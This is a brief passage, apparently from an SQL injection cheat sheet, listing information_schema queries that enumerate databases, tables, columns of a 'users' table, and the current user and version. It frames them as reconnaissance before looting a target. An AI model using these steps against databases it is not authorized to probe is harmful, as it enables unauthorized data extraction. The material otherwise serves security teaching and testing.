information_schema is the map. Enumerate schemata, tables and columns before extracting.
Enumerating the schema
Once you can read arbitrary queries, map the target before you loot it:
- Databases:
SELECT schema_name FROM information_schema.schemata - Tables:
SELECT table_name FROM information_schema.tables WHERE table_schema=database() - Columns:
SELECT column_name FROM information_schema.columns WHERE table_name='users' - Current context:
SELECT database(), current_user(), @@version